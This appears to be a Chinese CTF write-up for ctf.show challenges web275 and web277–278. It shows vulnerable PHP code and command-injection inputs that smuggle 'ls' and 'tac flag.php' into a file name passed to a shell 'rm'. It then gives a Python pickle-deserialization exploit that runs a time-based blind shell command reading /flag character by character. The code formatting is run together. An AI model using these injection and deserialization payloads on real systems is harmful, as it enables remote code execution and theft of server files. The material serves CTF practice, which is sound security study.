web275

这道题和序列化一点关系都没有
整个代码并没有说filename(f)怎么传参只有fn并且屏蔽了flag

highlight_file(__FILE__);class filter{public $filename;public $filecontent;public $evilfile=false;public function __construct($f,$fn){$this->filename=$f;$this->filecontent=$fn;}public function checkevil(){if(preg_match('/php|\.\./i', $this->filename)){$this->evilfile=true;}if(preg_match('/flag/i', $this->filecontent)){$this->evilfile=true;}return $this->evilfile;}public function __destruct(){if($this->evilfile){system('rm '.$this->filename);}}
}if(isset($_GET['fn'])){$content = file_get_contents('php://input');$f = new filter($_GET['fn'],$content);if($f->checkevil()===false){file_put_contents($_GET['fn'], $content);copy($_GET['fn'],md5(mt_rand()).'.txt');unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);echo 'work done';}}else{echo 'where is flag?';
}

$content = file_get_contents('php://input')
$f = new filter($_GET['fn'],$content);
GET :
?fn=php;ls
?fn=php;tac flag.php

这里其实就可以理解为我传fn为文件名，文件内容$content就是输入流得到的内容就是;后面的内容，但是作者这里用了两个fn来混淆，filter的fn是文件内容，但是外面的这个fn是文件名

$this->filename=$f;
$this->filecontent=$fn;

web277–web278

python序列化，EXP

import requests
import time
import string
import pickle
import base64
result=""
str="_-{}"+string.ascii_letters+string.digits  #大小写字母和数字
url="http://e8eaffdd-233c-4c5d-82d0-79a89a515df3.challenge.ctf.show/backdoor?data="payload="__import__('os').popen('if [ `cat /flag|cut -c {0}` == {1} ];then sleep 3;fi').read()"class Rce():def __init__(self,payload):self.code=payloaddef __reduce__(self):# print(self.code)return (eval,(self.code,))length=50  #length长度
key=0
for j in range(1,length):if key==1:breakfor n in str:rser = bytes.decode(base64.b64encode(pickle.dumps(Rce(payload.format(j,n)))))target=url+rser# print(target)try:requests.get(target,timeout=(2.5,2.5))except:result=result+nprint(result)break# if n=='9':#     key=1